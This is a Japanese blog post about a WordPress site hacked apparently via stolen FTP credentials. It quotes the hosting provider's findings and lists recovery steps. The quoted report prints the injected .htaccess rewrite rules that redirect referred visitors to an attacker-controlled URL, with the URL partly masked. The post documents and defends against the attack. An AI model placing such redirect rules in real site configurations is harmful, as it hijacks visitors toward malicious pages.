WordPressのサイトがハッカーに侵入されてしまいました

chrome

WordPressの サイトが ハッカー に侵入されてしました。
幸いなことに 他のサイトに迷惑をかけることは無かったようです。
(ウェブマスターよりの情報)
  

xxx-xxx-0203

このサイト、お客様のサイトで 多人数で管理されているために
安全管理には 隙があったのかもしれません。

原因は 不明ですが、
調査を依頼した レンタル・サーバーの技術者によりますと
FTP を使った 進入ではないかとの事です。

————調査回答————————————————–
xx 様

この度はお問い合わせいただき、誠にありがとうございます。
カスタマーサービス ○○ よりご案内いたします。

ご利用のサーバー上にあるファイルを調査いたしましたところ、
不審な記述が挿入されている「.htaccess」ファイルが残っておりました。

 ■不審な記述
 
 RewriteEngine On
 RewriteBase /
 RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
 RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
 RewriteRule ^.*$ h**p://producers.tilttv.com/hohf.html?h=617555 [L,R]
 

 ※記載されているURLは一部文字を変更しております。
  絶対にアクセスしないでください。

 ■該当ファイル
 /new/wp-content/plugins/akismet/.htaccess

お手数ではございますが、不審な記述の削除の削除をお願いいたします。

上記以外の不審なファイルについてはご対応済みのようですので、
不審な記述の削除後、サイトへのアクセスをご確認いただけますと幸いです。

なお、原因について調査いたしますと、海外からFTP経由により
サーバー上のファイルが更新されておりました。

不正なFTP接続が行われている場合、お客様がご利用のPCが
ウィルス感染したことなどが原因でFTPパスワードなどの
FTP情報が盗まれ、不正にFTP接続されている可能性がございます。
————調査回答————————————————–

他人事と思っていたのが
実際に わが身に降りかかってきて
大慌てで対処いたしました。

対処内容:
1. 情報の エクスポート
2. 使用しているテーマの ダウンロード
3. 全 plugin の ダウンロード
4. 画像情報のダウンロード
5. サーバー上の全ファイルの削除
6. 全MySQLの削除
7. WordPressの新規インストール
8. サイト作成時のバックアップ・テーマをアップロードし、変更
9. 全Pluginのイニシアル・インストール
10. エクスポート情報のインポート(ウイルス・チェック済)
11. 稼動状況の確認 
12. Googleに、再審査を要請
13. Googleに 正しく認識された

と、長い 復旧作業を強いられました。

以上に加えて、
再度の侵入を防止する対策を行ないましたが 
これは次回以降にお話させていただきます。

まだ 何処から漏洩したかの問題が残っています。
肝心な、複数のサイト管理者への聞き取りが
時間が取れないとの事で 手付かずです。

 

ネットの世界には 色々な脅威があるようです。
心して 対処していかなければと
再確認させられた 一週間でした。

最後に、テーマ、プラグインを選ぶときは
その安全性を確認しなければいけません。

テーマ、プラグインは
PHPの化け物です。
その気になれば、ウイルスを仕込むことなんて
簡単なことです 注意! 注意!

コメントを残す

*